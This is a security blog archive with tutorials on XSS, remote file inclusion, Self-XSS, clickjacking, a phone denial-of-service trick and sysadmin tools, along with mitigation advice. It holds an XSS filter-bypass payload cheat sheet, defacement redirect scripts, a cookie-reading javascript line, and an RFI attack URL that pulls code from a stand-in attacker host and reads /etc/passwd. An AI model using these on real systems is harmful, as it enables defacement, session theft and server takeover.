Showing posts with label Ethical Hacking.

Wednesday, January 23, 2013

10 System Admin Tools to Help You Secure Your Network


System admins are frequently bombarded with security concerns, requests, alerts, news items, “did you see this?!” emails, and more. Keeping up with all the aspects of network security can seem like an overwhelming task, but in this post we’re going to look at ten tools a system admin can use to help secure their network. Some you may be familiar with, like network security software, while others may come as a surprise, like your email client; but all will help you to stay ahead of the bad guys, keep yourself informed of the latest threats, and maintain the security of your network.

1. Network security software
When we talk about network security software, we’re talking about a class of product more than any specific tool, and how important it is for you to have an application or small group of applications that can help you to accomplish most of your tasks. There are simply too many things for any one admin to do by hand, and network security software applications help to automate the heavy lifting and ensure that you can keep up with the workload. Look for network security software that multitasks. Think about it as a Swiss Army knife of software packages that includes many of the other items on this list.

2. Vulnerability scanner
A good vulnerability scanner is a key part of any toolkit and should be used by server admins and security engineers alike. The top network security software packages include a scanner with a database of the thousands of known vulnerabilities that could exist on your network, so that you can quickly, easily and regularly scan your network to ensure your systems are up to date, configured properly and secured. Remember that a scanner only finds what is in its database; it does not replace patching or a manual review.

3. Port scanner
A port scanner is another regular tool that should be in your network security software application. Attackers regularly scan your Internet connection looking for ways in, and so should you. But you should also scan internally, so you can find unauthorized services or misconfigured systems and validate that your internal firewalls are set up correctly.

4. Patching software
Patching operating systems and third party applications is one of the most important, regularly recurring tasks a sys admin has. Network security software that can automate this, and handle the hundreds of other applications on your network, is the only realistic way you can keep up with this.

5. Auditing software
Auditing software may strike you as a strange recommendation at first, but consider all those apps you are trying to patch. How can you be sure you have no vulnerabilities on your systems if your users can install anything they like? How are you going to maintain licensing compliance if you don't know who has installed what from the shared software folder? Network security software may also include software and hardware inventory components to help you stay informed and secure.

6. Secure remote clients
Telnet, older versions of pcAnywhere and several of the web-based remote access apps out there all have a common issue: they are not secure. Use SSH protocol version 2 for access to all CLI-based systems, and Remote Desktop Protocol with Network Level Authentication enabled to manage Windows boxes. Strong encryption, good passwords, lockout policies and, when possible, mutual authentication between client and host (for example SSH host-key checking on the client side) will help to ensure no one sniffs credentials or brute-forces their way into a system. If you have two-factor authentication in your environment, ensure that every system that can use it does, to further reduce your risk from unauthorized access.

7. A good network analyzer
Whether you like the open source Wireshark, the free Microsoft Network Monitor (NetMon), or one of the many commercial network analysis tools, having a good "sniffer" is key to securing and analyzing systems. There is simply no more effective way to figure out what is going on between networked systems than to see the traffic first hand.

8. Network tools
Whenever you are dealing with connections from foreign systems, you will need to check network addresses, routes and more. Having good tools like dig, whois, host, tcping and others close at hand makes network evaluation a breeze.

9. Log parsing software
Securing systems means going through logs; lots of them. Web logs, access logs, system logs, security logs, SNMP traps, syslog – the list goes on. Having software that can quickly and easily parse logs is critical. Everyone has their favorite: some run locally, like Microsoft Log Parser, while others run on servers, like Splunk. Whichever you prefer, get a good log parser to help you wade through what can be millions of entries quickly, so you can find the events you need to check.
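The log parsing step in concrete form, as an added example that is not part of the original post: a small Python script that reads sshd lines in syslog format, counts failed password attempts per source address, flags addresses that look like a brute-force source, and reports any successful login from an address that had already failed earlier in the log. The log lines are constructed for the example (hostnames, users and addresses are made up), and the threshold values are assumptions to tune for your own traffic.

```python
import re
from collections import Counter, defaultdict

# Constructed sample of sshd lines in syslog format; the hosts, users and
# addresses are made up for this example.
SAMPLE_LOG = """\
Jan 23 10:01:12 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2
Jan 23 10:01:15 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.45 port 51023 ssh2
Jan 23 10:01:19 web1 sshd[2203]: Failed password for root from 203.0.113.45 port 51030 ssh2
Jan 23 10:01:22 web1 sshd[2205]: Failed password for invalid user oracle from 203.0.113.45 port 51041 ssh2
Jan 23 10:02:01 web1 sshd[2210]: Accepted publickey for deploy from 198.51.100.7 port 40110 ssh2
Jan 23 10:02:40 web1 sshd[2212]: Failed password for deploy from 198.51.100.7 port 40120 ssh2
Jan 23 10:02:44 web1 sshd[2212]: Accepted password for deploy from 198.51.100.7 port 40120 ssh2
Jan 23 10:03:05 web1 sshd[2220]: Failed password for root from 203.0.113.45 port 51055 ssh2
"""

# sshd writes "invalid user" when the account does not exist at all.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)
ACCEPTED_RE = re.compile(
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def analyze_auth_log(text, fail_threshold=5, user_threshold=3):
    """Single pass over the log text.

    Returns a dict with:
      failures            - failed password attempts per source address
      brute_force         - addresses with fail_threshold or more failures,
                            or that tried user_threshold or more user names
      login_after_failure - successful logins from an address that had
                            already failed earlier in the log
    The thresholds are assumptions for this example.
    """
    failures = Counter()
    users_tried = defaultdict(set)
    login_after_failure = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m["ip"]] += 1
            users_tried[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        # Counter returns 0 for unseen keys without inserting them.
        if m and failures[m["ip"]] > 0:
            login_after_failure.append((m["ip"], m["user"], m["method"]))
    brute_force = sorted(
        ip for ip, n in failures.items()
        if n >= fail_threshold or len(users_tried[ip]) >= user_threshold
    )
    return {
        "failures": dict(failures),
        "brute_force": brute_force,
        "login_after_failure": login_after_failure,
    }


if __name__ == "__main__":
    report = analyze_auth_log(SAMPLE_LOG)
    for ip, n in sorted(report["failures"].items(), key=lambda kv: -kv[1]):
        print(f"{ip:>15}  {n} failed password attempts")
    print("brute-force candidates:", ", ".join(report["brute_force"]) or "none")
    for ip, user, method in report["login_after_failure"]:
        print(f"check: {user} logged in from {ip} via {method} after earlier failures")
```

On a real host you would feed it the contents of /var/log/auth.log (or the journal); the "login after failures" report is the one worth reading first, because a password login that follows a run of failures from the same address is what a successful brute force looks like.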

10. Your email client
Knowledge is power, and the best way to amass that knowledge is to stay informed. Whether you subscribe to email bulletins, security alerts, or RSS feeds, your email client can provide you the first indications that something new is out there, and also what you need to do to protect your systems from the threat. Zero day exploits, out of band patches, best practices and more, can all be yours if you simply join the right distribution lists and subscribe to the right lists.

These 10 system admin tools are a great start towards building your toolkit for security. Network security software plays a major role in this toolkit, which you supplement with other tools and the information you need to maintain a secure environment.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. Learn more about the importance of a secure business network by downloading the free eBook: A first aid kit for SysAdmins. All product and company names herein may be trademarks of their respective owners.

Tuesday, February 28, 2012

XSS attacks practical examples ~ Cross site Scripting Exploits


Hello BTS readers, so far I have explained XSS attacks and the risks of this vulnerability, and I have provided a guide to setting up your own pentesting lab (using DVWA) to practice XSS attacks.

DVWA is limited to a few XSS methods, and you may be curious to see more practical examples of XSS attacks. eHackingNews will help you keep up with the latest ones.

The XSS Vulnerability section of EHackingNews covers the latest XSS attacks submitted by security experts and grey-hat hackers. This will give you an idea of what real XSS attacks look like.


Tuesday, February 7, 2012

Complete Cross site Scripting(XSS) cheat sheets : Part 1


I am providing this XSS cheat sheet after collecting the exploit codes from hackers' techniques and different sites, especially http://ha.ckers.org/xss.html . This is a list of XSS cheat codes that will help you test for XSS vulnerabilities, and is useful for bypassing filters. If you have any different cheat codes, please send them in.

Basic XSS codes:
----------------------------------
<script>alert("XSS")</script>

<script>alert("XSS");</script>

<script>alert('XSS')</script>

"><script>alert("XSS")</script>

<script>alert(/XSS/)</script>

When inside a script tag (the first entry closes the existing script block; the other two break out of a string literal and comment out the rest of the line):
---------------------------------
</script><script>alert(1)</script>
'; alert(1);//
');alert(1);//


Bypassing with toggle case (defeats filters that match "<script>" case-sensitively; HTML tag names are case-insensitive):
--------------------------------------
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>

XSS in Image and HTML tags:
---------------------------------------------
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>

<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

Note: the javascript: URLs in the SRC and BACKGROUND attributes above only execute in very old browsers; current browsers ignore them. The event-handler form, <img src=xss onerror=alert(1)>, is the one that still works today.

Bypass the script tag filtering (nested tags defeat filters that strip "<script>" in a single pass; the double URL-encoded entry only fires where the application decodes its input twice):
--------------------------------------------------

<<SCRIPT>alert("XSS");//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

"><s"%2b"cript>alert(document.cookie)</script>

foo<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

Using the String.fromCharCode function (builds the string "alert(1)" from character codes, so the literal text never appears in the payload; it still has to be passed to eval to run):
-----------------------------------------------------
<SCRIPT>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


You can combine the above codes to build your own payloads for a given filter.

Note:
We are extending the cheat sheet.  Soon we will publish the part 2.
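To make the filter-bypass idea concrete, here is an added Python example (not code from the original post or from ha.ckers.org) that runs a few of the payloads above through a naive blacklist filter of the kind the "toggle case" and "bypass the script tag filtering" sections are aimed at, and then through proper HTML output encoding. The naive filter (a case-sensitive, single-pass removal of "<script>" and "</script>") and the looks_executable heuristic are assumptions written for this example, not code from any real application.

```python
import html
import re

# A naive blacklist filter of the kind this cheat sheet defeats: it removes
# the literal tags <script> and </script>, case-sensitively, in one pass.
# Written for this example; it is not code from any real product.
TAG_RE = re.compile(r"</?script>")


def naive_filter(value: str) -> str:
    return TAG_RE.sub("", value)


# Rough heuristic used only to report results in this example: does the
# string still carry an obvious script vector after filtering?
VECTOR_RE = re.compile(r"<script\b|\bon\w+\s*=|javascript:", re.IGNORECASE)


def looks_executable(value: str) -> bool:
    return VECTOR_RE.search(value) is not None


def bypasses_naive_filter(payload: str) -> bool:
    """True if the payload survives the blacklist with a vector intact."""
    return looks_executable(naive_filter(payload))


def encode_for_html(value: str) -> str:
    """Output encoding for an HTML body or a quoted attribute value.

    Every < > & " ' becomes an entity, so the browser can only ever treat
    the value as text. Other contexts (inside <script>, in a URL, in CSS)
    need their own encoders; this one is for HTML content only.
    """
    return html.escape(value, quote=True)


# Payloads taken from the cheat sheet above.
PAYLOADS = [
    '<script>alert("XSS")</script>',
    "<ScRiPt>alert(1)</sCriPt>",
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    "<img src=xss onerror=alert(1)>",
    "<BODY ONLOAD=alert('XSS')>",
]


def triage(payloads=PAYLOADS):
    """Map each payload to (after naive filter, bypassed?, after encoding)."""
    return {
        p: (naive_filter(p), bypasses_naive_filter(p), encode_for_html(p))
        for p in payloads
    }


if __name__ == "__main__":
    for payload, (filtered, bypassed, encoded) in triage().items():
        status = "BYPASS" if bypassed else "blocked"
        print(f"{status:8} {payload!r}")
        print(f"         filter -> {filtered!r}")
        print(f"         encode -> {encoded!r}")
```

Only the plain lowercase <script> payload is stopped by the blacklist; the toggled case, the nested tags (which the single pass turns back into a clean <script>alert(1)</script>) and the event handlers all go straight through. After encoding, none of the five contains a literal < or quote any more, which is why output encoding in the right context, not a blacklist, is the fix.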



Saturday, January 21, 2012

Complete Cross Site Scripting(XSS) Guide : Web Application Pen Testing


Hello BTS readers, here is the complete set of posts that explain everything about cross site scripting. More articles are on the way; stay tuned to BreakTheSec!


Link To Tutorials:
PenTesting Lab to practice XSS attacks:

Saturday, December 31, 2011

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial



This is my third article in the cross site scripting tutorial. Last time, I explained how to test for XSS vulnerabilities and some filter-bypassing techniques. Now let us see how a hacker defaces a website through an XSS vulnerability.

Never use this technique on a site you do not own or have permission to test. It is explained for educational purposes only.

Defacement is one of the most common things a hacker does after finding a vulnerability in a website: the site's content is replaced with the hacker's own content. Most of the time the attacker uses this to tell the admin about the vulnerability, but it is a bad idea; a responsible report to the admin does the job without breaking anything.

Script for changing the background color of a website:
<script>document.body.bgColor="red";</script>


Script for changing the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>


Defacement Page with Pastehtml:
First of all, upload a defacement page (HTML) to pastehtml.com and get the link.

When you find an XSS-vulnerable site, insert the script as:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script redirects the page to your pastehtml defacement page.

Note: only a persistent (stored) XSS vulnerability defaces the page for every visitor. With reflected XSS only the victims who open the crafted link see the changed page.

Sunday, December 25, 2011

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking



I hope you learned about SQL injection and XSS from BTS. But you may be curious to practice SQLi and XSS attacks, and we know that attacking a third-party website is a crime. So how can we practice? Here is the solution, friends: why not set up your own web application? Yes, you can set up your own pen testing lab for practicing XSS and SQLi vulnerabilities.

While surfing the Internet, I came across the "Damn Vulnerable Web App (DVWA)". It is a web application built for practicing your ethical hacking / pen testing skills legally.

Download this web Application from here:
http://www.dvwa.co.uk/

To install this application you will need a web server with PHP and MySQL, such as XAMPP. Keep the lab off the Internet: DVWA is deliberately vulnerable, so bind it to localhost or run it in a VM that only you can reach.

The installation procedure :


Using this application, you can also practice:

  • LFI/RFI (file inclusion)
  • Command execution
  • File upload
  • Login brute force
If you have any doubts, check their wiki page or comment here.

Thursday, December 15, 2011

Introduction to Vulnerability Assessment


What is Vulnerability Assessment? 
Vulnerability assessment is the process of identifying and classifying the vulnerabilities in a system. Assessments are performed on many kinds of systems, such as IT systems, nuclear power plants and water supply systems. Vulnerability from the perspective of disaster management means assessing the threats from potential hazards to the population and to infrastructure. It may be conducted in the political, social, economic or environmental fields.

The steps involved in Vulnerability Assessment:


  • Classifying capabilities and assets (resources) in a system.
  • Assigning quantifiable value and importance to those resources.
  • Identifying the vulnerabilities in each resource.
  • Mitigating or eliminating the most serious vulnerabilities for the most valuable resources.


Standard risk analysis is mostly interested in exploring and examining the risks surrounding a given asset or resource (in the IT industry's case, digital information, the continued smooth operation of a program, or the unimpeded performance of an OS or network) as well as its function and design. Such assessments tend to concentrate on the direct consequences and root causes for the failure of the scrutinized object.

In contrast, vulnerability assessment is more concerned with both the adverse effects on the asset itself and on the principal and secondary consequences for the surrounding system environment. At any rate, this analysis type is mostly focused on the possibilities of mitigating such risks and improving the security capacity and performance rating of a given network or computer system in order to better manage future incidents.

Vulnerability testing is usually performed with automated tools (e.g. a Joomla vulnerability scanner). These tools identify vulnerabilities and give tips for mitigating or patching them, but they are limited to common, known vulnerabilities; logic flaws and anything not in their signature database will be missed. Vulnerability assessment can be done by in-house staff (i.e. network administrators), but it is often outsourced to Managed Security Service Providers (MSSPs).

Wednesday, November 16, 2011

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention


Last time, I explained the clickjacking attack and its prevention. Today, I am going to explain the Self-XSS (cross site scripting) attack.

What is Self-XSS?
Self-XSS is a popular social engineering attack in which attackers trick users into pasting malicious code into their own browser. The result is that the attacker gets access to the user's session on whatever website they are visiting. Scammers usually use this attack to push products or to make money through online surveys.

Recently, hackers attacked Facebook with explicit hardcore porn images. Facebook said it might have been a Self-XSS attack.

JavaScript can be executed from the browser URL bar.
For example, enter the following code in your browser:
javascript:alert('BreakTheSecurity');
This will show a pop-up box with "BreakTheSecurity". An attacker can use this for malicious purposes: he can steal confidential data and cookies, redirect you to malware sites and more.
For example, entering the following code will display the cookies of the current site in your browser:
javascript:alert("Cookies:"+document.cookie+"  "+"\n By \n BreakTheSecurity");

The above code does nothing malicious other than displaying the cookies, but an attacker can extend the script so that it sends them to his own server. (Current browsers strip the javascript: prefix from text pasted into the address bar precisely because of this attack, which is why scammers now ask victims to paste the code into the developer console instead.)

Security tips from BreakTheSecurity:
  • Use the NoScript add-on, which prevents JavaScript from running in your browser.
  • Don't click shortened URLs, for example bit.ly/55ewEb?22. They may redirect to infected sites.
Be aware of social engineering:
  • If anyone asks you (even a friend) to paste a script into the browser bar, never do it.
  • If anyone says "iPhone for only $10", don't be eager to click it.
  • If anyone says "1000 shares will cure a baby", never do it. Facebook shares never make money or cure babies.
  • Read our EHN spam report to keep up with the latest Facebook scams.
God gave us a sixth sense; use it and think before you click any link or follow anyone's instructions.

Sunday, November 13, 2011

Remote File Inclusion Vulnerability Tutorial~Web application Vulnerability



This is an old tutorial, but it is worth reading. I wrote this article six months ago but forgot to post it, so here it is.

Remote file inclusion (RFI) is a web application vulnerability. Using it, an attacker can make the server include a remote file of their choosing, such as a web shell, which typically results in website defacement.

A web shell is a script, often with a browser-based GUI, that lets the attacker browse files on the web server and run their own code on it.


By running malicious code on the web server, an attacker can take control of the whole server.

Using this vulnerability, an attacker can:
  • Execute malicious code
  • Cause a denial of service
  • Deliver cross site scripting (XSS) payloads


When is a web application vulnerable to file inclusion?

The web application becomes vulnerable because of unvalidated external variables (such as $_POST, $_GET and $_COOKIE). The main problem is the "include" function: include() fetches another file and runs it as part of the current page. If the allow_url_include directive (and allow_url_fopen, which it depends on) is enabled in php.ini, an attacker can include files from a remote URL.

Let us look into some examples, Consider this PHP code.
<?php
// Deliberately vulnerable example: the value comes straight from the request.
$incfile = $_REQUEST['NewsFile'];
// The attacker-controlled value is used to build the include path.
include($incfile . '.php');
?>


In this code, the line "$incfile = $_REQUEST['NewsFile'];" takes input from the HTTP request (the value passed in the URL, the POST body or a cookie). The next line includes "$incfile.php" dynamically.

For instance, consider this URL:

http://vulnerablesite.com/index.php?NewsFile=news1

Here news1 is passed as the NewsFile parameter. The PHP code reads it through $_REQUEST, and the include call pulls news1.php into the index page.

Note one thing here: the developer does not validate the request input at all. That is what makes the page vulnerable: an attacker can change the value and launch a remote file inclusion attack.

How does an attacker use this vulnerability?

An attacker can use this vulnerability to include his own files. For instance, he can change the value of the NewsFile parameter in the URL like this:

http://vulnerablesite.com/index.php?NewsFile=http://attackersite/malicous_code

Now the value of NewsFile is http://attackersite/malicous_code, so the include call becomes:

include('http://attackersite/malicous_code.php');

The attacker's code is fetched from his server and executed by the victim's web server. From there he can run any code he likes, typically dropping a web shell to gain access to the site's files.

Null byte:

What if the attacker wants to include a file that does not end in .php, such as a text file? The include always appends .php. Using the null byte (%00 in the URL), the attacker can chop off the .php suffix: with NewsFile set to http://attackersite/malicous_code.txt%00 the path string ends at the null byte, so the appended .php is ignored and any file type can be included. (This only worked on PHP versions before 5.3.4, which started rejecting paths that contain null bytes.)

By giving NewsFile a value such as ../../../../etc/passwd%00, the attacker can read the password file on a UNIX system through directory traversal (a local file inclusion, which works even with remote URLs disabled).

Preventing RFI

  • Disable register_globals, allow_url_fopen and allow_url_include in php.ini (allow_url_include is off by default in PHP 5.2 and later).
  • Validate user input: never build an include path from raw input; compare the value against an allowlist of known file names and reject anything else.
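The "validate user input" advice in concrete form, as an added Python example rather than the page's PHP: a resolver that only accepts a bare file name from an allowlisted character set and then confirms the final path stays inside the news directory, run against the page's own attack values. The directory name and the resolve_news_file function are assumptions made for this example; the same logic ports directly to PHP with preg_match() and realpath().

```python
import posixpath as pp
import re

# Assumed location of the news pages; not from the original post.
NEWS_DIR = "/var/www/app/news"

# Only bare names like "news1" or "press-2011_12" are acceptable. No slashes,
# no dots, no colons, no null bytes: that excludes URLs, traversal and the
# %00 trick in one go.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_include_path(news_file: str) -> str:
    """What the page's PHP does: append .php to whatever the client sent."""
    return news_file + ".php"


def resolve_news_file(news_file: str) -> str:
    """Return the absolute path to include, or raise ValueError.

    Two independent checks: the allowlist regex on the raw value, and a
    containment check on the normalized path, so a mistake in one does not
    reopen the hole.
    """
    if not NAME_RE.fullmatch(news_file):
        raise ValueError(f"rejected NewsFile value {news_file!r}")
    path = pp.normpath(pp.join(NEWS_DIR, news_file + ".php"))
    if pp.commonpath([NEWS_DIR, path]) != NEWS_DIR:
        raise ValueError("resolved path escapes the news directory")
    return path


def classify(news_file: str):
    """Convenience wrapper: ('ok', path) or ('rejected', reason)."""
    try:
        return ("ok", resolve_news_file(news_file))
    except ValueError as exc:
        return ("rejected", str(exc))


# The legitimate value and the attack values discussed on the page. The
# "%00" is shown already URL-decoded, i.e. as a real NUL byte.
SAMPLES = [
    "news1",
    "http://attackersite/malicous_code",
    "http://attackersite/malicous_code.txt\x00",
    "../../../../etc/passwd\x00",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(f"{value!r}")
        print(f"  vulnerable include: {vulnerable_include_path(value)!r}")
        print(f"  hardened resolver:  {classify(value)}")
```

The regex alone already rejects every attack value on the page; the containment check is there for the day someone loosens the regex to allow subdirectories. Keep allow_url_include off as well, so that even a bypass of the validation cannot reach a remote URL.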

Friday, November 11, 2011

Shield Against Hacking With a Daily Anti-Malware Scan




Hacking; it's the fear of every website owner and it keeps many online business owners up at night, checking their website and servers, making sure they are still in control. It's scary: one day you are doing well and selling products, the next, you can't log into your website, you have profane images instead of product images, and your site is spreading malware that most search engines block and that most browsers keep visitors from reaching. This can take years to recover from, even after the malware is gone, but there is hope. Malware often takes a while to really get into the system and cause damage, and as with a human virus, if it is stopped early you will not suffer these terrible effects.

What is hacking?
Hacking is a large culture with a large number of methods and attacks to get around your security, sneak into your website and server, and change everything around. There are many ways of doing this, but it is commonly done through malware that is designed to consume files and strike at an inopportune moment.

The problem about this is that, until the virus strikes, you may not know anything is happening. Just like a human virus, it is consuming files (like cells) and will manifest effects when it is already too late. By the time you notice that you cannot login, or that weird things are happening on your website, it's already too late. You have been taken over, and there are many disastrous effects to this.

The most direct effect is that your website is ruined. Well, that can be fixed easily enough. The real trouble is your private information. Do you have any credit cards, passwords, private business files and other classified information that only your or other associates should see? Hacking is a common form of corporate espionage, which is why you may be targeted.

If you have 10+ years in Internet security, maybe you can handle this by yourself; however, most website owners do not have this experience. Instead, you can use computer support Sydney daily malware scans. What does this do for you? Everyday, the computer support Sydney company will scan all your website files for malware. Since the malware typically needs several days or longer to really affect the website, this allows you to get rid of the malware before you see anything happen.

Another benefit to a daily malware scan is that most of the infected code or file can be metaphorically sanitized, leaving you with a clean website free of digital germs. Not only that, but this malware scanner is updated daily with new malware formats, methods and strategies that hackers think up. Think of this as a doctor who learns more and more about his field, just this works much faster.

This can also easily scale up from beginner websites to enterprise-sized monoliths. So if you are worried about size, either because you have a small or a large website, don't let that be a concern. Your entire website can be scanned and searched for malware, which will then be promptly removed so you can enjoy the freedom of a clean website without viruses.

No website, especially a business website, can live a successful online life without daily malware scanning. Hackers come in for fun to destroy websites with weak code, and corporate espionage will target any competitors that do not have appropriate online security. Don't be another hacked website, don't fall to this devastating online virus. Use a daily malware scanner, and keep those nasty germs away from your precious website.

Author:
Jacob Pettit
Marketing, GO8
jacob@go8.com.au


Tuesday, November 8, 2011

DoS (denial of service) attack on Mobile phones


As we are in a world influenced by information security, we as security professionals have seen many kinds of DoS and DDoS attacks happening around the world. But what if someone DoSes your daily communication companion, your mobile device, and you are just unable to call or operate your phone properly, not even listen to music or watch videos?

Some years back, around 2003, a DoS was possible on a Nokia phone. Now there is a new way (at least I think so) to perform a DoS attack on a Samsung mobile phone, because of the auto call reject functionality of Samsung phones.

Auto call reject functionality: this function of Samsung phones is used to block a number from calling you. When a person adds a number like xxxxxxxxxx to the reject list and xxxxxxxxxx calls that person, the call is automatically disconnected, so that number cannot connect a call with you.

Example: if Bob has a Samsung mobile phone and adds Mak's mobile number to his auto reject list, then when Mak calls Bob the call is disconnected on the first ring and Bob just gets a missed call alert for Mak's call.

It is a nice function of Samsung mobile phones for blocking unwanted callers, but as the example shows, the rejection function rejects the call yet still shows a missed call alert for the blocked number. This is the main flaw (bug) that allows the DoS on Samsung mobile phones.

Let's take the above example again. Mak's mobile number is in the reject list of Bob's Samsung phone, so when Mak calls Bob his call ends immediately with a missed call alert on Bob's phone. But what if Mak calls Bob every few seconds? Then it becomes a DoS on Bob's Samsung mobile phone: if Mak calls Bob again and again using his phone's auto redial function, Bob is unable to receive anyone else's calls, because the phone shows busy to the other callers. Bob cannot even make calls, listen to music, watch videos or take photos, because the phone continuously shows missed call alerts for Mak's calls.

It happens because the missed call alert takes a long time to leave the phone's screen. Samsung should add a function like some Chinese phones have: they just don't show any alert on the screen and instead keep a log of blocked calls.

Anyone can give missed calls to a mobile number for some time, so that the user of the Samsung phone adds the number to the auto reject list; then the attacker can register on Mobivox or a similar service and write an AutoIt3 script or similar to give missed calls to the person, and it is a DoS on his Samsung mobile.

Author : Ashish Mistry, Founder of Hcon
Information Security Researcher, Penetration Tester, Malware Researcher, Trainer


Friday, November 4, 2011

Find If A Website Is safe To Open or not using Online sites and Tools



In the last post, we explained how to check whether a site is safe using McAfee SiteAdvisor. Now I am going to introduce some other sites and tools for testing whether a site is safe to open.

Websites to check sites:

Norton Safe Web:
Norton Safe Web is a free online service from Norton (Symantec). It works the same way as McAfee SiteAdvisor.
You can check a site's safety here:
http://safeweb.norton.com/

Google Safe Browsing:
Google Safe Browsing analyzes the site for malware. It also reports the status of the site over the past months.
URL to check:
www.google.com/safebrowsing/diagnostic?site=www.google.com
Replace www.google.com with your target site.

If you manually find any sites spreading malware, you can report here:
http://www.google.com/safebrowsing/report_badware/

AVG LinkScanner:
AVG LinkScanner is a free tool that also works like McAfee SiteAdvisor.

  • Checks each web page in real time before it opens on your computer
  • Automatically updates whenever a new threat is discovered
Download it from here:
http://linkscanner.avg.com/

Don't forget to check your own site frequently. Attackers can inject malicious scripts into your site too, and these reputation services only flag what they have already seen.

Thursday, November 3, 2011

What is Clickjacking Attack? How to Prevent? | UI Redressing


Will answering a simple maths quiz delete your social network account? If your answer is "No", then read this news item, LinkedIn Clickjacking Vulnerability, and come back. Will visiting a website turn on your webcam? The answer is "Yes". Check the Flash Player clickjacking vulnerability.

If you read the above news completely, it will be easy for you to understand what clickjacking is. Ok, let's continue with our article.
Clickjacking, also known as UI redressing, is a malicious technique that tricks users into clicking a button or image that performs a hidden action on another site.
An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they intended to click on the innocuous page. Thus the attacker hijacks the click and sends it to another website; that's why it is known as clickjacking (click + hijacking). The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

Example:
Let's take the real-world example of the LinkedIn clickjacking vulnerability.
The page looks like a simple maths problem, but once you click the submit button it deletes your LinkedIn account (if you are logged in) without asking any questions, because the visible button sits on top of LinkedIn's account-deletion button loaded in an invisible frame.

Clickjacking Attack can be used for:
  • Tricking users into turning on their webcam and microphone using the Adobe Flash vulnerability (this security flaw has been fixed by Adobe)
  • Getting more Twitter followers
  • Posting on your Facebook wall
  • Deleting your profile

Prevention Techniques:

Client Side(Security tips for users):
Flash Player:
Update your Flash Player (old versions are vulnerable to clickjacking).

Browser Security Addons: 
Noscript:
NoScript is a Mozilla Firefox add-on that provides protection against clickjacking (its ClearClick feature), XSS and other malicious scripts. NoScript is available for mobiles also.

Comitari Web Protection Suite: Comitari provides client-side protection against clickjacking (aka UI redressing) attacks. Installed as a browser add-on.

GuardedID: a commercial product that provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iframes.

Server Side (for developers)
Frame killer:
A framekiller is a JavaScript snippet placed in a web page to stop the page from being loaded inside a frame on another site. This gives some protection against frame-based clickjacking, but framekillers can be bypassed (for example by disabling JavaScript in the frame with the IE security attribute or the HTML5 sandbox), so the reliable defence is the X-Frame-Options response header (DENY or SAMEORIGIN), which tells the browser itself to refuse to render the page in a foreign frame.

How to Hide email address when sending mail to Multiple Recipients


Recently, I got a mail from my institute (where I learned Java) regarding an interview. When I looked at the To address, it included the other recipients' email addresses (including girls' email addresses). This is not a big matter when you send mail within an organization, but what if you send it to others?

Just for fun:
Just imagine you have two girlfriends and you forward some interesting mail to both. If either one notices the To address, you will end up in hospital.

If you would like to hide email addresses from the other recipients while sending to multiple recipients, this article will explain how. I believe this will be helpful for organizations and those concerned about security.

How to do it?
It is very simple.

Whenever you send mail to a group of addresses, put the addresses in the BCC field instead of the To field (leave the To field empty, or put your own address there).

BCC stands for Blind Carbon Copy.



Each receiver will see the sender's address only.
They can't see the other recipients' addresses.

Wednesday, November 2, 2011

Could Your Bad Password Habits Come Back To Haunt You?



According to Business Insider, the CEO of a major social network used its trusted database of user passwords in order to hack into one of its user’s email accounts. The hack was based on the guess that this user probably accessed all of their accounts using the same password.

Although the cloud has provided us with some amazing new tools, it’s also created the need for increased end-user education and policy enforcement.

Yes, it’s true that nearly all cloud providers act ethically. They invest heavily in security as a means of protecting their reputations. But also, there are laws which strictly dictate how they must handle and protect their client data.

